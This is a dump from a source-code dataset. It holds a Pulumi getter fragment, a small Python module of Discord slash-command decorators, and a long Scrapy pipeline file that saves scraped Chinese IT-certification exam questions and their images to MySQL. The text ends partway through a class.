@pulumi.getter(name="subnetSize")
def subnet_size(self) -> pulumi.Output[int]:
"""
The number of bits for the subnet in CIDR notation. Example: 32.
"""
return pulumi.get(self, "subnet_size")
[per-file quality-signal columns omitted]
hexsha: 337e44854f818ed5a728b6973405dd69567e7602 | size: 2,027 | ext: py | lang: Python | path: pyslash/decorators.py | repo: starsflower/discordpy-slash-commands (also amcwb/discordpy-slash-commands) | repo_head: ec72d2b24c369ba40a0f5c07c7959ba00dc4ded7 | licenses: ["MIT"] | stars: 1 (2021-05-10) | issues: 1 (2021-10-31 to 2021-11-04)
from typing import List
from discord_slash import SlashCommand, cog_ext
from .converters import convert
from .utils import *
def slash_cog(name: str = None, description: str = None, guild_ids: List[int] = None, remove_underscore_keywords: bool = True):
"""
Add a command to a cog
Parameters
----------
name : str, optional
The name of the command, by default None
description : str, optional
The description, by default None
guild_ids : List[int], optional
The guild IDs to add the command to, by default None
remove_underscore_keywords : bool, optional
Whether to remove _ from the end of arguments that would be keywords,
by default True
"""
def decorator(function):
# Use annotations
params, converter_params = get_slash_kwargs(
function, name, description, guild_ids, remove_underscore_keywords)
return cog_ext.cog_slash(**params)(convert(**converter_params)(function))
return decorator
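# Hypothetical usage sketch (the cog class, command name, and body are
# illustrative assumptions, not part of this module):
#
#   class Greeter(commands.Cog):
#       @slash_cog(name="hello", description="Says hello")
#       async def hello(self, ctx, who: str):
#           await ctx.send(f"Hello {who}!")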
def slash(slash_class: SlashCommand, name: str = None, description: str = None, guild_ids: List[int] = None, remove_underscore_keywords: bool = True):
"""
Add a command to a bot at the top level
Parameters
----------
slash_class : SlashCommand
The slash object to add this command to
name : str, optional
The name of the command, by default None
description : str, optional
The description, by default None
guild_ids : List[int], optional
The guild IDs to add the command to, by default None
remove_underscore_keywords : bool, optional
Whether to remove _ from the end of arguments that would be keywords,
by default True
"""
def decorator(function):
# Use annotations
params, converter_params = get_slash_kwargs(
function, name, description, guild_ids, remove_underscore_keywords)
return slash_class.slash(**params)(convert(**converter_params)(function))
return decorator
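# A minimal usage sketch (added for illustration, not from the original file):
# it assumes a discord.py Cog subclass and an existing SlashCommand instance
# named `slash_cmd`; the command names and guild ID below are placeholders.
#
#     class Greetings(commands.Cog):
#         @slash_cog(name="hello", description="Say hello", guild_ids=[123456789])
#         async def hello(self, ctx, who: str):
#             await ctx.send(f"Hello, {who}!")
#
#     @slash(slash_cmd, name="ping", description="Pong!")
#     async def ping(ctx):
#         await ctx.send("pong")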
| 33.783333
| 150
| 0.680316
| 258
| 2,027
| 5.205426
| 0.22093
| 0.047655
| 0.107223
| 0.047655
| 0.810127
| 0.810127
| 0.810127
| 0.810127
| 0.726731
| 0.726731
| 0
| 0
| 0.246177
| 2,027
| 59
| 151
| 34.355932
| 0.878927
| 0.457819
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0
| 0.75
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 8
| 33828d9e622c6cbdd530c2099452e50b75b55fdb
| 40,940
| py
| Python
| rkpass/pipelines.py
| windowshappy/python
| 02b43b657a284b2db300ce7d7862e5032c688b1d
| ["MIT"] | 10
| 2019-01-17T15:09:01.000Z
| 2022-03-01T06:19:22.000Z
| rkpass/pipelines.py
| windowshappy/python
| 02b43b657a284b2db300ce7d7862e5032c688b1d
| ["MIT"] | null | null | null
| rkpass/pipelines.py
| windowshappy/python
| 02b43b657a284b2db300ce7d7862e5032c688b1d
| ["MIT"] | 6
| 2018-10-29T15:31:50.000Z
| 2020-08-13T08:34:46.000Z |
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html
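# For example, a hypothetical entry in this project's settings.py enabling the
# pipelines below (the module path and priorities are placeholders):
#
#     ITEM_PIPELINES = {
#         'rkpass.pipelines.QuestionImagePipeline': 200,
#         'rkpass.pipelines.RkpassPipeline': 300,
#     }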
import pymysql
import scrapy
import re
from scrapy.exceptions import DropItem
from scrapy.pipelines.images import ImagesPipeline
# Store the morning question bank into the database
class RkpassPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# Execute the SQL statement
self.cursor.execute(insert_sql, tuple(data.values()))
# Commit the transaction to the database
self.db.commit()
except Exception:
# Roll back if an error occurs
self.db.rollback()
return item
# Question image downloader
class QuestionImagePipeline(ImagesPipeline):
def file_path(self, request, response=None, info=None):
item = request.meta['item']
url = request.url
file_name = item['field'] + '/' + url.split('/')[-1]
return file_name
def get_media_requests(self, item, info):
if item['questionImg']:
yield scrapy.Request(item['questionImg'], meta={'item': item})
else:
return item
def item_completed(self, results, item, info):
image_path = [x['path'] for ok, x in results if ok]
if not image_path:
# raise DropItem("Item contains no images")
return item
else:
item['questionImg'] = '/storage/images/' + "".join(image_path)
return item
# Option A image download
class OptionAImagePipeline(ImagesPipeline):
def file_path(self, request, response=None, info=None):
item = request.meta['item']
url = request.url
file_name = item['field'] + '/' + url.split('/')[-1]
return file_name
def get_media_requests(self, item, info):
url = "".join(re.findall(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+',
item['optiona']))
if url:
yield scrapy.Request(url, meta={'item': item})
else:
return item
def item_completed(self, results, item, info):
image_path = [x['path'] for ok, x in results if ok]
if not image_path:
# raise DropItem("Item contains no images")
return item
else:
item['optiona'] = 'A.' + '/storage/images/' + "".join(image_path)
return item
# Option B image download
class OptionBImagePipeline(ImagesPipeline):
def file_path(self, request, response=None, info=None):
item = request.meta['item']
url = request.url
file_name = item['field'] + '/' + url.split('/')[-1]
return file_name
def get_media_requests(self, item, info):
url = "".join(re.findall(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+',
item['optionb']))
if url:
yield scrapy.Request(url, meta={'item': item})
else:
return item
def item_completed(self, results, item, info):
image_path = [x['path'] for ok, x in results if ok]
if not image_path:
# raise DropItem("Item contains no images")
return item
else:
item['optionb'] = 'B.' + '/storage/images/' + "".join(image_path)
return item
# Option C image download
class OptionCImagePipeline(ImagesPipeline):
def file_path(self, request, response=None, info=None):
item = request.meta['item']
url = request.url
file_name = item['field'] + '/' + url.split('/')[-1]
return file_name
def get_media_requests(self, item, info):
url = "".join(re.findall(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+',
item['optionc']))
if url:
yield scrapy.Request(url, meta={'item': item})
else:
return item
def item_completed(self, results, item, info):
image_path = [x['path'] for ok, x in results if ok]
if not image_path:
# raise DropItem("Item contains no images")
return item
else:
item['optionc'] = 'C.' + '/storage/images/' + "".join(image_path)
return item
# Option D image download
class OptionDImagePipeline(ImagesPipeline):
def file_path(self, request, response=None, info=None):
item = request.meta['item']
url = request.url
file_name = item['field'] + '/' + url.split('/')[-1]
return file_name
def get_media_requests(self, item, info):
url = "".join(re.findall(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+',
item['optiond']))
if url:
yield scrapy.Request(url, meta={'item': item})
else:
return item
def item_completed(self, results, item, info):
image_path = [x['path'] for ok, x in results if ok]
if not image_path:
# raise DropItem("Item contains no images")
return item
else:
item['optiond'] = 'D.' + '/storage/images/' + "".join(image_path)
return item
# Store the afternoon question bank into the database
class AfterPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into afternoon(question, questionImg, optionA, optionB, optionC, optionD, optionE, optionAanswer, optionAanswerImg, optionBanswer, optionBanswerImg, optionCanswer, optionCanswerImg, optionDanswer, optionDanswerImg, optionEanswer, optionEanswerImg, field) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# Execute the SQL statement
self.cursor.execute(insert_sql, tuple(data.values()))
# Commit the transaction to the database
self.db.commit()
except Exception:
# Roll back if an error occurs
self.db.rollback()
return item
# Question image downloader
class AfterQuestionImagePipeline(ImagesPipeline):
def file_path(self, request, response=None, info=None):
item = request.meta['item']
url = request.url
file_name = item['field'] + '/' + url.split('/')[-1]
return file_name
def get_media_requests(self, item, info):
if "".join(item['questionImg']): # 判断题目中是否有图片 有则循环遍历list下载图片 否则直接返回空值
for img_item in item['questionImg']:
yield scrapy.Request(img_item, meta={'item': item})
else:
item['questionImg'] = "".join(item['questionImg']) # 巨坑 list不能直接入库(转成string)
return item
def item_completed(self, results, item, info):
image_path = [x['path'] for ok, x in results if ok]
if not image_path:
# raise DropItem("Item contains no images")
return item
else:
tempimg = '' # concatenate the question's multiple images into one string (each image separated by ';')
for local_img in image_path:
tempimg += '/storage/images/' + local_img + ';'
item['questionImg'] = tempimg
return item
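# (For reference: after the join above, item['questionImg'] ends up as a single
# string such as '/storage/images/<field>/a.png;/storage/images/<field>/b.png;'
# with a trailing ';'.)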
# Question 1 image download
class optionAanswerImgPipeline(ImagesPipeline):
def file_path(self, request, response=None, info=None):
item = request.meta['item']
url = request.url
file_name = item['field'] + '/' + url.split('/')[-1]
return file_name
def get_media_requests(self, item, info):
if "".join(item['optionAanswerImg']):
for img_item in item['optionAanswerImg']:
yield scrapy.Request(img_item, meta={'item': item})
else:
item['optionAanswerImg'] = "".join(item['optionAanswerImg'])
return item
def item_completed(self, results, item, info):
image_path = [x['path'] for ok, x in results if ok]
if not image_path:
# raise DropItem("Item contains no images")
return item
else:
tempimg = '' # concatenate the question's multiple images into one string (each image separated by ';')
for local_img in image_path:
tempimg += '/storage/images/' + local_img + ';'
item['optionAanswerImg'] = tempimg
return item
# Question 2 image download
class optionBanswerImgPipeline(ImagesPipeline):
def file_path(self, request, response=None, info=None):
item = request.meta['item']
url = request.url
file_name = item['field'] + '/' + url.split('/')[-1]
return file_name
def get_media_requests(self, item, info):
if "".join(item['optionBanswerImg']):
for img_item in item['optionBanswerImg']:
yield scrapy.Request(img_item, meta={'item': item})
else:
item['optionBanswerImg'] = "".join(item['optionBanswerImg'])
return item
def item_completed(self, results, item, info):
image_path = [x['path'] for ok, x in results if ok]
if not image_path:
# raise DropItem("Item contains no images")
return item
else:
tempimg = '' # concatenate the question's multiple images into one string (each image separated by ';')
for local_img in image_path:
tempimg += '/storage/images/' + local_img + ';'
item['optionBanswerImg'] = tempimg
return item
# Question 3 image download
class optionCanswerImgPipeline(ImagesPipeline):
def file_path(self, request, response=None, info=None):
item = request.meta['item']
url = request.url
file_name = item['field'] + '/' + url.split('/')[-1]
return file_name
def get_media_requests(self, item, info):
if "".join(item['optionCanswerImg']):
for img_item in item['optionCanswerImg']:
yield scrapy.Request(img_item, meta={'item': item})
else:
item['optionCanswerImg'] = "".join(item['optionCanswerImg'])
return item
def item_completed(self, results, item, info):
image_path = [x['path'] for ok, x in results if ok]
if not image_path:
# raise DropItem("Item contains no images")
return item
else:
tempimg = '' # concatenate the question's multiple images into one string (each image separated by ';')
for local_img in image_path:
tempimg += '/storage/images/' + local_img + ';'
item['optionCanswerImg'] = tempimg
return item
# Question 4 image download
class optionDanswerImgPipeline(ImagesPipeline):
def file_path(self, request, response=None, info=None):
item = request.meta['item']
url = request.url
file_name = item['field'] + '/' + url.split('/')[-1]
return file_name
def get_media_requests(self, item, info):
if "".join(item['optionDanswerImg']):
for img_item in item['optionDanswerImg']:
yield scrapy.Request(img_item, meta={'item': item})
else:
item['optionDanswerImg'] = "".join(item['optionDanswerImg'])
return item
def item_completed(self, results, item, info):
image_path = [x['path'] for ok, x in results if ok]
if not image_path:
# raise DropItem("Item contains no images")
return item
else:
tempimg = '' # concatenate the question's multiple images into one string (each image separated by ';')
for local_img in image_path:
tempimg += '/storage/images/' + local_img + ';'
item['optionDanswerImg'] = tempimg
return item
# Question 5 image download
class optionEanswerImgPipeline(ImagesPipeline):
def file_path(self, request, response=None, info=None):
item = request.meta['item']
url = request.url
file_name = item['field'] + '/' + url.split('/')[-1]
return file_name
def get_media_requests(self, item, info):
if "".join(item['optionEanswerImg']):
for img_item in item['optionEanswerImg']:
yield scrapy.Request(img_item, meta={'item': item})
else:
item['optionEanswerImg'] = "".join(item['optionEanswerImg'])
return item
def item_completed(self, results, item, info):
image_path = [x['path'] for ok, x in results if ok]
if not image_path:
# raise DropItem("Item contains no images")
return item
else:
tempimg = '' # concatenate the question's multiple images into one string (each image separated by ';')
for local_img in image_path:
tempimg += '/storage/images/' + local_img + ';'
item['optionEanswerImg'] = tempimg
return item
# Network Engineer: store the morning question bank into the database
class wlMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into wl_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# Execute the SQL statement
self.cursor.execute(insert_sql, tuple(data.values()))
# Commit the transaction to the database
self.db.commit()
except Exception:
# Roll back if an error occurs
self.db.rollback()
return item
# Information Systems Supervisor: store the morning question bank into the database
class xxMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into xx_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# Execute the SQL statement
self.cursor.execute(insert_sql, tuple(data.values()))
# Commit the transaction to the database
self.db.commit()
except Exception:
# Roll back if an error occurs
self.db.rollback()
return item
# Database Systems Engineer: store the morning question bank into the database
class sjkMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into sjk_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# Execute the SQL statement
self.cursor.execute(insert_sql, tuple(data.values()))
# Commit the transaction to the database
self.db.commit()
except Exception:
# Roll back if an error occurs
self.db.rollback()
return item
# Software Evaluator: store the morning question bank into the database
class rjpcsMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into rjpcs_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# Execute the SQL statement
self.cursor.execute(insert_sql, tuple(data.values()))
# Commit the transaction to the database
self.db.commit()
except Exception:
# Roll back if an error occurs
self.db.rollback()
return item
# Embedded Systems Designer: store the morning question bank into the database
class qrsMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into qrs_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# Execute the SQL statement
self.cursor.execute(insert_sql, tuple(data.values()))
# Commit the transaction to the database
self.db.commit()
except Exception:
# Roll back if an error occurs
self.db.rollback()
return item
# E-commerce Designer: store the morning question bank into the database
class dzswMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into dzsw_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# Execute the SQL statement
self.cursor.execute(insert_sql, tuple(data.values()))
# Commit the transaction to the database
self.db.commit()
except Exception:
# Roll back if an error occurs
self.db.rollback()
return item
# Multimedia Application Designer: store the morning question bank into the database
class mediaMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into media_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# Execute the SQL statement
self.cursor.execute(insert_sql, tuple(data.values()))
# Commit the transaction to the database
self.db.commit()
except Exception:
# Roll back if an error occurs
self.db.rollback()
return item
# Information Systems Management Engineer: store the morning question bank into the database
class xxxtMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into xxxt_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# Execute the SQL statement
self.cursor.execute(insert_sql, tuple(data.values()))
# Commit the transaction to the database
self.db.commit()
except Exception:
# Roll back if an error occurs
self.db.rollback()
return item
# Information Security Engineer: store the morning question bank into the database
class xxaqMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into xxaq_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# Execute the SQL statement
self.cursor.execute(insert_sql, tuple(data.values()))
# Commit the transaction to the database
self.db.commit()
except Exception:
# Roll back if an error occurs
self.db.rollback()
return item
# Systems Integration Project Management Engineer: store the morning question bank into the database
class xtjcMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into xtjc_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# Execute the SQL statement
self.cursor.execute(insert_sql, tuple(data.values()))
# Commit the transaction to the database
self.db.commit()
except Exception:
# Roll back if an error occurs
self.db.rollback()
return item
# Systems Planning and Management Specialist: store the morning question bank into the database
class xtghMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into xtgh_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# Execute the SQL statement
self.cursor.execute(insert_sql, tuple(data.values()))
# Commit the transaction to the database
self.db.commit()
except Exception:
# Roll back if an error occurs
self.db.rollback()
return item
# Network Planning Designer: store the morning question bank into the database
class wlghMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into wlgh_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# Execute the SQL statement
self.cursor.execute(insert_sql, tuple(data.values()))
# Commit the transaction to the database
self.db.commit()
except Exception:
# Roll back if an error occurs
self.db.rollback()
return item
# Systems Architect: store the morning question bank into the database
class xtjgMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into xtjg_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# Execute the SQL statement
self.cursor.execute(insert_sql, tuple(data.values()))
# Commit the transaction to the database
self.db.commit()
except Exception:
# Roll back if an error occurs
self.db.rollback()
return item
# Systems Analyst: store the morning question bank into the database
class xtfxMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
self.port = port
self.database = database
self.username = username
self.password = password
@classmethod
def from_crawler(cls, crawler):
return cls(
host=crawler.settings.get('MYSQL_HOST'),
port=crawler.settings.get('MYSQL_PORT'),
database=crawler.settings.get('MYSQL_DATABASE'),
username=crawler.settings.get('MYSQL_USERNAME'),
password=crawler.settings.get('MYSQL_PASSWORD'),
)
def open_spider(self, spider):
self.db = pymysql.connect(self.host, self.username, self.password, self.database, charset='utf8',
port=self.port)
self.cursor = self.db.cursor()
def close_spider(self, spider):
self.db.close()
def process_item(self, item, spider):
data = dict(item)
insert_sql = "insert into xtfx_morning(question, questionImg, optiona, optionb, optionc, optiond, answer, answeranalysis, field, questionNum, knowledgeOne, knowledgeTwo) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
try:
# Execute the SQL statement
self.cursor.execute(insert_sql, tuple(data.values()))
# Commit the transaction to the database
self.db.commit()
except Exception:
# Roll back if an error occurs
self.db.rollback()
return item
# Information Systems Project Manager: store the morning question bank into the database
class xxxtxmMorningPipeline(object):
def __init__(self, host, port, database, username, password):
self.host = host
